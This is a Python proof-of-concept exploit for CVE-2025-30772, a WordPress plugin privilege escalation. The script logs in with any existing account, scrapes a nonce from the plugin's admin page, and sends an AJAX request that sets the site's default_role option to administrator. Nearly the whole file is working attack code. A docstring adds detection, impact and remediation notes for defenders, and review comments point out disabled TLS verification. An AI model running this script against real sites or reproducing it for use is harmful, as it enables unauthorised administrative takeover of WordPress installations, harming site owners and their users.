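"""Proof of concept for CVE-2025-30772 (WordPress privilege escalation).

Flow, as implemented below:

1. Log in to ``wp-login.php`` with an existing WordPress account.
2. Read a nonce from the plugin admin page ``wpclever-wpcuf`` (tab ``uf``).
3. POST the AJAX action ``wpcuf_import_export_save`` to ``admin-ajax.php``
   with ``name=default_role`` and ``rules="administrator"``.

Defender notes:

* Detection: in web or WAF logs, an authenticated POST to
  ``/wp-admin/admin-ajax.php`` whose body carries
  ``action=wpcuf_import_export_save`` together with a ``name`` that is a
  WordPress core option such as ``default_role``.
* Impact (inferred from the request shape, confirm against the plugin
  source): the handler appears to store ``rules`` under the option named by
  ``name`` without restricting which option may be written.
* Remediation: update the plugin to a release that fixes CVE-2025-30772,
  check that the ``default_role`` option holds the intended role, and review
  accounts registered while the site was exposed.
"""
import argparse
import re
import sys

import requests

# by Nxploited | Khaled Alenazi,

# Suppresses urllib3 warnings, including the one normally emitted for the
# unverified HTTPS requests this script makes (see create_session).
requests.packages.urllib3.disable_warnings()


def create_session():
    """Return a ``requests.Session`` with TLS certificate verification off.

    NOTE(review): with ``verify = False`` the credentials posted by
    ``authenticate`` are sent to a peer whose identity is never checked.
    """
    session = requests.Session()
    session.verify = False
    return session


def authenticate(session, base_url, username, password):
    """Log in through ``wp-login.php`` and exit the process on failure.

    Success is judged only by the presence of a cookie whose name contains
    ``wordpress_logged_in`` in the session's cookie jar; the HTTP status and
    body of the login response are not inspected.

    Args:
        session: Session returned by ``create_session``.
        base_url: Site base URL; the path is appended as-is.
        username: WordPress account name.
        password: WordPress account password.
    """
    login_endpoint = f"{base_url}/wp-login.php"
    payload = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0'
    }
    # The response object is not needed: the login result is read from the
    # cookie jar that the session fills in.
    session.post(login_endpoint, data=payload, headers=headers)
    if not any('wordpress_logged_in' in c.name for c in session.cookies):
        sys.exit("[!] Login failed.")
    print("[+] Authenticated")


def extract_nonce(session, base_url):
    """Fetch the plugin admin page and return the first nonce found in it.

    The nonce is taken from the first ``"nonce":"..."`` pair in the page
    source. The process exits if no such pair is present.

    Returns:
        The nonce string captured from the page.
    """
    page_url = f"{base_url}/wp-admin/admin.php?page=wpclever-wpcuf&tab=uf"
    response = session.get(page_url)
    match = re.search(r'"nonce":"(.*?)"', response.text)
    if not match:
        sys.exit("[!] Nonce not found.")
    nonce = match.group(1)
    print(f"[+] Nonce: {nonce}")
    return nonce


def send_exploit(session, base_url, nonce):
    """POST the ``wpcuf_import_export_save`` AJAX action and report the result.

    The request asks the plugin to save ``rules='"administrator"'`` under
    ``name='default_role'``. This exact parameter combination is the
    signature to look for in request logs. Success is reported when the
    response body contains ``Done!``; otherwise the body is printed.
    """
    endpoint = f"{base_url}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'wpcuf_import_export_save',
        'name': 'default_role',
        'rules': '"administrator"',
        'nonce': nonce
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    response = session.post(endpoint, data=payload, headers=headers)
    if "Done!" in response.text:
        print("[+] Exploit executed successfully")
    else:
        print("[!] Exploit failed")
        print(response.text)


def main():
    """Parse the command line and run login, nonce lookup and the AJAX request."""
    parser = argparse.ArgumentParser(description="WordPress Privilege Escalation Exploit - CVE-2025-30772 # By Nxploited | Khaled ALenazi,")
    parser.add_argument("-u", "--url", required=True, help="Target base URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    # NOTE(review): the password arrives via argv, so it is visible in the
    # process list and in shell history on the machine running the script.
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()

    session = create_session()
    authenticate(session, args.url, args.username, args.password)
    nonce = extract_nonce(session, args.url)
    send_exploit(session, args.url, nonce)


if __name__ == "__main__":
    main()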